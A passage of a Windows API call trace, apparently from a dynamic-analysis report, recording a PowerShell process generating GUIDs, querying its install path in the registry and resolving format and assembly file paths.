pguid=0x26d4f0*(Data1=0xba3f7287, Data2=0x5c81, Data3=0x4633, Data4=([0]=0xa8, [1]=0x85, [2]=0xeb, [3]=0xc9, [4]=0x6a, [5]=0xbd, [6]=0x4d, [7]=0x84))) returned 0x0 [0049.449] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xda86dda1, Data2=0xa28b, Data3=0x4f91, Data4=([0]=0x8d, [1]=0xaf, [2]=0xb6, [3]=0x13, [4]=0xd4, [5]=0x4e, [6]=0x9, [7]=0xde))) returned 0x0 [0049.458] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d24c, lpData=0x0, lpcbData=0x26d248*=0x0 | out: lpType=0x26d24c*=0x1, lpData=0x0, lpcbData=0x26d248*=0x56) returned 0x0 [0049.459] CoTaskMemAlloc (cb=0x5a) returned 0x1b87b220 [0049.459] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d21c, lpData=0x1b87b220, lpcbData=0x26d218*=0x56 | out: lpType=0x26d21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d218*=0x56) returned 0x0 [0049.459] CoTaskMemFree (pv=0x1b87b220) [0049.459] RegCloseKey (hKey=0x30c) returned 0x0 [0049.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0049.469] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xcb465778, Data2=0x6841, Data3=0x403b, Data4=([0]=0xab, [1]=0x82, [2]=0x94, [3]=0x3a, [4]=0x63, [5]=0xf2, [6]=0xf, [7]=0x61))) returned 0x0 [0049.469] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x6f486d76, Data2=0xae83, Data3=0x4a1f, Data4=([0]=0xbb, [1]=0xc8, [2]=0x4, [3]=0x8, [4]=0xe7, [5]=0xcb, [6]=0xf9, [7]=0xd3))) returned 0x0 [0049.504] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x4aacbc78, Data2=0x6bfe, Data3=0x4b49, Data4=([0]=0x84, [1]=0xe1, [2]=0x3, [3]=0xab, [4]=0xd3, [5]=0xe9, [6]=0x9, [7]=0x13))) returned 0x0 [0049.508] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xbc122ccf, Data2=0x3331, Data3=0x408b, Data4=([0]=0xa2, [1]=0x7f, [2]=0x3e, [3]=0xa1, [4]=0x5e, [5]=0x28, [6]=0x68, [7]=0x99))) returned 0x0 [0049.512] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xdf2cb2b6, Data2=0x6630, Data3=0x4432, Data4=([0]=0xa6, [1]=0x3b, [2]=0xa7, [3]=0xf7, [4]=0x39, [5]=0x49, [6]=0xa1, [7]=0x85))) returned 0x0 [0049.513] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x746d55f5, Data2=0x3468, Data3=0x4d66, Data4=([0]=0x87, [1]=0x6e, [2]=0x2a, [3]=0xe9, [4]=0x4f, [5]=0xf8, [6]=0xcd, [7]=0x2f))) returned 0x0 [0049.520] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x4825f9e5, Data2=0xbd75, Data3=0x4072, Data4=([0]=0x8b, [1]=0x84, [2]=0x27, [3]=0x3b, [4]=0x6, [5]=0xae, [6]=0xaa, [7]=0xca))) returned 0x0 [0049.522] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x8fe94964, Data2=0xe98c, Data3=0x48a9, Data4=([0]=0xb3, [1]=0xce, [2]=0xfc, [3]=0x25, [4]=0xce, [5]=0x99, [6]=0x9c, [7]=0x7b))) returned 0x0 [0049.522] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x45011e66, Data2=0x6703, Data3=0x422c, Data4=([0]=0xba, [1]=0xbc, [2]=0x79, [3]=0x0, [4]=0x88, [5]=0xa9, [6]=0x91, [7]=0x85))) returned 0x0 [0049.523] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xdd279773, Data2=0x7e9f, Data3=0x4622, Data4=([0]=0xbf, [1]=0x0, [2]=0x19, [3]=0x8a, [4]=0xd5, [5]=0x53, [6]=0x40, [7]=0x79))) returned 0x0 [0049.523] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x4449e8a, Data2=0xadc4, Data3=0x4b36, Data4=([0]=0xb9, [1]=0x6f, [2]=0xe3, [3]=0xc7, [4]=0xbf, [5]=0xa8, [6]=0x4f, [7]=0x13))) returned 0x0 [0049.524] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xd1a9553b, Data2=0x8995, Data3=0x484e, Data4=([0]=0x88, [1]=0x11, [2]=0x88, [3]=0x97, [4]=0xbb, [5]=0x37, [6]=0x9, [7]=0x20))) returned 0x0 [0049.524] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xf514b936, Data2=0xeffa, Data3=0x4036, Data4=([0]=0xa8, [1]=0xa9, [2]=0xd7, [3]=0xd3, [4]=0xa5, [5]=0x94, [6]=0x70, [7]=0xeb))) returned 0x0 [0049.524] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x3262c020, Data2=0x15d0, Data3=0x47e2, Data4=([0]=0x81, [1]=0x80, [2]=0xd6, [3]=0x12, [4]=0xc3, [5]=0x4f, [6]=0xec, [7]=0xf5))) returned 0x0 [0049.525] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x9a99aaff, Data2=0xc68d, Data3=0x41b2, Data4=([0]=0x8d, [1]=0x38, [2]=0xa9, [3]=0x7b, [4]=0xe4, [5]=0x1, [6]=0xbb, [7]=0xb1))) returned 0x0 [0049.529] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xe3074b6b, Data2=0x50d3, Data3=0x44b9, Data4=([0]=0x85, [1]=0x51, [2]=0x71, [3]=0x26, [4]=0xda, [5]=0x3a, [6]=0xec, [7]=0x8b))) returned 0x0 [0049.532] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x3ddc26a8, Data2=0x4e70, Data3=0x4c9b, Data4=([0]=0xb7, [1]=0xf4, [2]=0x10, [3]=0xb, [4]=0x57, [5]=0x67, [6]=0xfe, [7]=0xcc))) returned 0x0 [0049.534] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x78b606a9, Data2=0x1848, Data3=0x4b2a, Data4=([0]=0x94, [1]=0x4f, [2]=0xf7, [3]=0x41, [4]=0x56, [5]=0x0, [6]=0xaf, [7]=0xc1))) returned 0x0 [0049.535] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x8854dbd0, Data2=0x8ae6, Data3=0x4229, Data4=([0]=0xaf, [1]=0x2b, [2]=0xbc, [3]=0x32, [4]=0x6e, [5]=0x1a, [6]=0xed, [7]=0x2a))) returned 0x0 [0049.535] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x1ae0c518, Data2=0x9933, Data3=0x4654, Data4=([0]=0xa6, [1]=0xb9, [2]=0xa8, [3]=0x84, [4]=0xdb, [5]=0xf9, [6]=0x2d, [7]=0xa5))) returned 0x0 [0049.535] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x74dd725e, Data2=0x11, Data3=0x4a22, Data4=([0]=0xb6, [1]=0x2d, [2]=0x94, [3]=0x14, [4]=0x1c, [5]=0x1a, [6]=0x45, [7]=0x65))) returned 0x0 [0049.536] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x85e32c0b, Data2=0xb9b1, Data3=0x4855, Data4=([0]=0xaa, [1]=0x72, [2]=0xee, [3]=0x9, [4]=0xb2, [5]=0xae, [6]=0x9b, [7]=0xa0))) returned 0x0 [0049.536] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x622f6667, Data2=0x51e2, Data3=0x4409, Data4=([0]=0xbe, [1]=0xd0, [2]=0xb4, [3]=0xc9, [4]=0xf2, [5]=0x63, [6]=0xe6, [7]=0xc4))) returned 0x0 [0049.536] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x4840f7d4, Data2=0x7b18, Data3=0x4821, Data4=([0]=0x93, [1]=0x62, [2]=0x6d, [3]=0x29, [4]=0xf4, [5]=0xb9, [6]=0x4, [7]=0xa))) returned 0x0 [0049.537] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xe3566705, Data2=0xece1, Data3=0x43f2, Data4=([0]=0xa0, [1]=0xea, [2]=0x8b, [3]=0x48, [4]=0xa3, [5]=0xd9, [6]=0x8f, [7]=0xba))) returned 0x0 [0049.545] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d24c, lpData=0x0, lpcbData=0x26d248*=0x0 | out: lpType=0x26d24c*=0x1, lpData=0x0, lpcbData=0x26d248*=0x56) returned 0x0 [0049.545] CoTaskMemAlloc (cb=0x5a) returned 0x1b87b220 [0049.545] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d21c, lpData=0x1b87b220, lpcbData=0x26d218*=0x56 | out: lpType=0x26d21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d218*=0x56) returned 0x0 [0049.548] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x639fadfc, Data2=0x7b0f, Data3=0x4be1, Data4=([0]=0x86, [1]=0xd9, [2]=0xec, [3]=0x67, [4]=0x1f, [5]=0x74, [6]=0x55, [7]=0xc3))) returned 0x0 [0049.548] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x220d311e, Data2=0x10e4, Data3=0x487f, Data4=([0]=0x83, [1]=0xa6, [2]=0xf1, [3]=0xe7, [4]=0xb0, [5]=0x7, [6]=0xaf, [7]=0x6c))) returned 0x0 [0049.548] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xb61ff036, Data2=0x67af, Data3=0x48d7, Data4=([0]=0xad, [1]=0xdf, [2]=0x80, [3]=0x34, [4]=0xe7, [5]=0x49, [6]=0x66, [7]=0x81))) returned 0x0 [0049.549] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x5535c983, Data2=0x5f18, Data3=0x452a, Data4=([0]=0x98, [1]=0x10, [2]=0x21, [3]=0x85, [4]=0xdc, [5]=0xe6, [6]=0xaa, [7]=0xa0))) returned 0x0 [0049.549] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x80157a3a, Data2=0xd9c9, Data3=0x478d, Data4=([0]=0xa1, [1]=0x70, [2]=0x3d, [3]=0xaf, [4]=0x64, [5]=0xcc, [6]=0xec, [7]=0x7b))) returned 0x0 [0049.549] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xd5152e6, Data2=0xab6f, Data3=0x486a, Data4=([0]=0x8e, [1]=0xd7, [2]=0xd4, [3]=0x25, [4]=0xf0, [5]=0x68, [6]=0x9f, [7]=0x52))) returned 0x0 [0049.549] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x23b4c356, Data2=0xd702, Data3=0x4d7f, Data4=([0]=0x93, [1]=0x2a, [2]=0xe0, [3]=0x51, [4]=0x6a, [5]=0xda, [6]=0x52, [7]=0x79))) returned 0x0 [0049.550] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x6abdd448, Data2=0x49b9, Data3=0x462a, Data4=([0]=0xa9, [1]=0x32, [2]=0xca, [3]=0xcd, [4]=0xe5, [5]=0x8e, [6]=0xa5, [7]=0x6))) returned 0x0 [0049.550] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x5cacb92d, Data2=0xbf6b, Data3=0x464d, Data4=([0]=0x9b, [1]=0x32, [2]=0x36, [3]=0x6f, [4]=0xdd, [5]=0x83, [6]=0x3, [7]=0x38))) returned 0x0 [0049.550] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x3a493421, Data2=0xcce0, Data3=0x44ff, Data4=([0]=0xab, [1]=0x9, [2]=0x86, [3]=0x3c, [4]=0xb9, [5]=0xd, [6]=0x48, [7]=0x3))) returned 0x0 [0049.550] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x63b3419c, Data2=0x8efb, Data3=0x4534, Data4=([0]=0x81, [1]=0xac, [2]=0x52, [3]=0x46, [4]=0x4f, [5]=0xfa, [6]=0x5f, [7]=0x94))) returned 0x0 [0049.550] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x82d4e234, Data2=0xb20a, Data3=0x4e34, Data4=([0]=0xa2, [1]=0x78, [2]=0x48, [3]=0xbe, [4]=0xc6, [5]=0xf1, [6]=0x95, [7]=0x75))) returned 0x0 [0049.550] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x35792026, Data2=0x767, Data3=0x4486, Data4=([0]=0xba, [1]=0xad, [2]=0xe2, [3]=0xc4, [4]=0xac, [5]=0xe5, [6]=0x29, [7]=0x7d))) returned 0x0 [0049.551] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xf1306235, Data2=0x5f52, Data3=0x4a39, Data4=([0]=0x87, [1]=0x8f, [2]=0x86, [3]=0x52, [4]=0xa3, [5]=0xfd, [6]=0x83, [7]=0xcf))) returned 0x0 [0049.551] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xaad93422, Data2=0x2fbe, Data3=0x4ab6, Data4=([0]=0x9b, [1]=0xe5, [2]=0x6f, [3]=0xa, [4]=0xd1, [5]=0xf1, [6]=0x4b, [7]=0x9c))) returned 0x0 [0049.551] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x831a3642, Data2=0x2b36, Data3=0x4ba0, Data4=([0]=0x89, [1]=0x22, [2]=0xaf, [3]=0xa1, [4]=0xe7, [5]=0x67, [6]=0xc9, [7]=0x7))) returned 0x0 [0049.551] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x8b489dd4, Data2=0x57c, Data3=0x4f26, Data4=([0]=0x9e, [1]=0x38, [2]=0xcf, [3]=0x97, [4]=0xdb, [5]=0x41, [6]=0x48, [7]=0xb9))) returned 0x0 [0049.551] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x80465b00, Data2=0x4feb, Data3=0x4b9c, Data4=([0]=0x8b, [1]=0x89, [2]=0x32, [3]=0xfd, [4]=0xa1, [5]=0x98, [6]=0x36, [7]=0x7a))) returned 0x0 [0049.552] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xf252f3c4, Data2=0x2b0a, Data3=0x4bb4, Data4=([0]=0x96, [1]=0x19, [2]=0xae, [3]=0x8c, [4]=0x1f, [5]=0x48, [6]=0xb6, [7]=0x0))) returned 0x0 [0049.552] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xff56ff86, Data2=0x21d6, Data3=0x4617, Data4=([0]=0x80, [1]=0x42, [2]=0xda, [3]=0xdf, [4]=0x17, [5]=0xa, [6]=0x5e, [7]=0xf4))) returned 0x0 [0049.553] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x3a181dc7, Data2=0xdeff, Data3=0x4be5, Data4=([0]=0xb7, [1]=0x3a, [2]=0x1, [3]=0xfb, [4]=0xff, [5]=0x9c, [6]=0x42, [7]=0xf6))) returned 0x0 [0049.553] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x64b3682, Data2=0x599d, Data3=0x4667, Data4=([0]=0xaa, [1]=0x17, [2]=0xd, [3]=0x7b, [4]=0x87, [5]=0x78, [6]=0x44, [7]=0x6f))) returned 0x0 [0049.553] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xc6982428, Data2=0xd790, Data3=0x43db, Data4=([0]=0xb8, [1]=0xbc, [2]=0x5, [3]=0xbd, [4]=0x5a, [5]=0x2e, [6]=0xc, [7]=0x40))) returned 0x0 [0049.553] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x2e80b1e2, Data2=0xcbfd, Data3=0x4d21, Data4=([0]=0x84, [1]=0xd7, [2]=0x8e, [3]=0x6b, [4]=0xc0, [5]=0x1, [6]=0x38, [7]=0x80))) returned 0x0 [0049.554] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xf883ee8c, Data2=0xc22b, Data3=0x4453, Data4=([0]=0xa0, [1]=0x11, [2]=0x32, [3]=0xa4, [4]=0x69, [5]=0x7f, [6]=0xd4, [7]=0xae))) returned 0x0 [0049.554] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x7ec2f6a2, Data2=0x5a98, Data3=0x47a7, Data4=([0]=0xa7, [1]=0x11, [2]=0xd1, [3]=0x56, [4]=0xe, [5]=0xbc, [6]=0xf6, [7]=0xb9))) returned 0x0 [0049.554] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x928a3a59, Data2=0xe06a, Data3=0x4b47, Data4=([0]=0x91, [1]=0xce, [2]=0x13, [3]=0x60, [4]=0xb4, [5]=0x69, [6]=0x45, [7]=0x5b))) returned 0x0 [0049.554] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xbe86daf, Data2=0x346a, Data3=0x4514, Data4=([0]=0x96, [1]=0xa0, [2]=0x9f, [3]=0x8c, [4]=0x9f, [5]=0x1e, [6]=0x5e, [7]=0x4a))) returned 0x0 [0049.554] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x3427b6ab, Data2=0xf063, Data3=0x4811, Data4=([0]=0x83, [1]=0xcc, [2]=0xda, [3]=0x77, [4]=0x35, [5]=0x2, [6]=0x53, [7]=0x3a))) returned 0x0 [0049.555] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x6a5abe19, Data2=0x5c5b, Data3=0x4e1c, Data4=([0]=0x92, [1]=0x35, [2]=0x9a, [3]=0xc9, [4]=0xe6, [5]=0x96, [6]=0xdd, [7]=0xda))) returned 0x0 [0049.555] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x73b74afb, Data2=0x5465, Data3=0x4842, Data4=([0]=0x9a, [1]=0x7f, [2]=0x11, [3]=0xd3, [4]=0x2d, [5]=0xb5, [6]=0x4f, [7]=0x5e))) returned 0x0 [0049.555] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x18bd56b2, Data2=0x3004, Data3=0x4bf8, Data4=([0]=0x83, [1]=0x43, [2]=0x84, [3]=0xbd, [4]=0x26, [5]=0x32, [6]=0xab, [7]=0x59))) returned 0x0 [0049.555] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xe9c36d54, Data2=0x7569, Data3=0x4ad5, Data4=([0]=0x9a, [1]=0x9a, [2]=0x57, [3]=0x1b, [4]=0xe3, [5]=0xb1, [6]=0x70, [7]=0x57))) returned 0x0 [0049.559] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x425f2be, Data2=0x58ca, Data3=0x4b8c, Data4=([0]=0xa2, [1]=0xd5, [2]=0xac, [3]=0xf7, [4]=0x2e, [5]=0x8, [6]=0x73, [7]=0xc4))) returned 0x0 [0049.559] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x7d304544, Data2=0xdae9, Data3=0x409e, Data4=([0]=0x85, [1]=0x3, [2]=0x5b, [3]=0x6d, [4]=0x69, [5]=0x63, [6]=0xed, [7]=0xc6))) returned 0x0 [0049.559] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x1017f1cb, Data2=0x414a, Data3=0x4967, Data4=([0]=0xa1, [1]=0x3, [2]=0x11, [3]=0x26, [4]=0x5f, [5]=0xdd, [6]=0xdd, [7]=0xf8))) returned 0x0 [0049.560] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x3a1b6d6c, Data2=0x40c4, Data3=0x4fc3, Data4=([0]=0x84, [1]=0x4d, [2]=0x81, [3]=0x16, [4]=0x9c, [5]=0x51, [6]=0xd6, [7]=0xaa))) returned 0x0 [0049.560] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xb10fae2, Data2=0xf74b, Data3=0x4bff, Data4=([0]=0xb2, [1]=0xd8, [2]=0xeb, [3]=0x14, [4]=0xc0, [5]=0x85, [6]=0xa9, [7]=0x41))) returned 0x0 [0049.560] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xa2bd2235, Data2=0x1113, Data3=0x49ae, Data4=([0]=0xb2, [1]=0xbe, [2]=0x77, [3]=0xf3, [4]=0x81, [5]=0xfd, [6]=0xfd, [7]=0x87))) returned 0x0 [0049.560] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x54ea863e, Data2=0xbcd8, Data3=0x4807, Data4=([0]=0xb1, [1]=0x56, [2]=0x7a, [3]=0xfe, [4]=0xbd, [5]=0x42, [6]=0xb7, [7]=0xc0))) returned 0x0 [0049.560] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x48edbfca, Data2=0x70c4, Data3=0x4ebd, Data4=([0]=0xab, [1]=0x46, [2]=0x29, [3]=0x8, [4]=0xf1, [5]=0x1d, [6]=0x2e, [7]=0x52))) returned 0x0 [0049.561] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xd99d2267, Data2=0xa7f4, Data3=0x43d4, Data4=([0]=0xab, [1]=0xaa, [2]=0x27, [3]=0xa6, [4]=0xf3, [5]=0x1b, [6]=0x2f, [7]=0xbc))) returned 0x0 [0049.561] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xb72720fa, Data2=0xba9a, Data3=0x4393, Data4=([0]=0xa6, [1]=0xa3, [2]=0x98, [3]=0x77, [4]=0xc4, [5]=0x10, [6]=0x53, [7]=0xaf))) returned 0x0 [0049.561] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xe221fd22, Data2=0xe3b9, Data3=0x4763, Data4=([0]=0xa9, [1]=0x8d, [2]=0xcc, [3]=0x93, [4]=0x9e, [5]=0x7c, [6]=0xfe, [7]=0xe4))) returned 0x0 [0049.561] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xba1674b, Data2=0x6da, Data3=0x4e71, Data4=([0]=0xa3, [1]=0x2c, [2]=0x43, [3]=0x67, [4]=0xaf, [5]=0x71, [6]=0x9d, [7]=0x22))) returned 0x0 [0049.562] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xbad817f2, Data2=0x1177, Data3=0x4bd2, Data4=([0]=0x95, [1]=0x5d, [2]=0xf5, [3]=0xf1, [4]=0xb5, [5]=0x22, [6]=0xc6, [7]=0x5))) returned 0x0 [0049.562] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x500a1b4d, Data2=0xba28, Data3=0x4306, Data4=([0]=0x8c, [1]=0x75, [2]=0xa0, [3]=0x82, [4]=0xd, [5]=0x49, [6]=0x94, [7]=0xb6))) returned 0x0 [0049.562] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xc4feb71d, Data2=0x983c, Data3=0x48cc, Data4=([0]=0x8f, [1]=0xbe, [2]=0xc2, [3]=0x26, [4]=0xa0, [5]=0xac, [6]=0xf7, [7]=0x49))) returned 0x0 [0049.566] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d24c, lpData=0x0, lpcbData=0x26d248*=0x0 | out: lpType=0x26d24c*=0x1, lpData=0x0, lpcbData=0x26d248*=0x56) returned 0x0 [0049.566] CoTaskMemAlloc (cb=0x5a) returned 0x1b87b220 [0049.566] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d21c, lpData=0x1b87b220, lpcbData=0x26d218*=0x56 | out: lpType=0x26d21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d218*=0x56) returned 0x0 [0049.567] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0x55c12c5e, Data2=0xffaf, Data3=0x49b5, Data4=([0]=0x94, [1]=0x17, [2]=0x56, [3]=0xfd, [4]=0x18, [5]=0xbf, [6]=0x9e, [7]=0xb0))) returned 0x0 [0049.567] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xac9ec6c6, Data2=0x48f5, Data3=0x4aee, Data4=([0]=0x88, [1]=0x1c, [2]=0xd4, [3]=0x47, [4]=0xa7, [5]=0x6c, [6]=0xce, [7]=0xa))) returned 0x0 [0049.571] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d24c, lpData=0x0, lpcbData=0x26d248*=0x0 | out: lpType=0x26d24c*=0x1, lpData=0x0, lpcbData=0x26d248*=0x56) returned 0x0 [0049.571] CoTaskMemAlloc (cb=0x5a) returned 0x1b87b220 [0049.571] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d21c, lpData=0x1b87b220, lpcbData=0x26d218*=0x56 | out: lpType=0x26d21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d218*=0x56) returned 0x0 [0049.573] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xd08b1e51, Data2=0x1252, Data3=0x4582, Data4=([0]=0x8f, [1]=0xc0, [2]=0xc2, [3]=0x8c, [4]=0x72, [5]=0x65, [6]=0xeb, [7]=0xf2))) returned 0x0 [0049.573] CoCreateGuid (in: pguid=0x26d4f0 | out: pguid=0x26d4f0*(Data1=0xc97f8388, Data2=0x8977, Data3=0x44e5, Data4=([0]=0xb3, [1]=0x96, [2]=0xbc, [3]=0x36, [4]=0x38, [5]=0xba, [6]=0x36, [7]=0x65))) returned 0x0 [0049.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0049.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0049.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0049.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 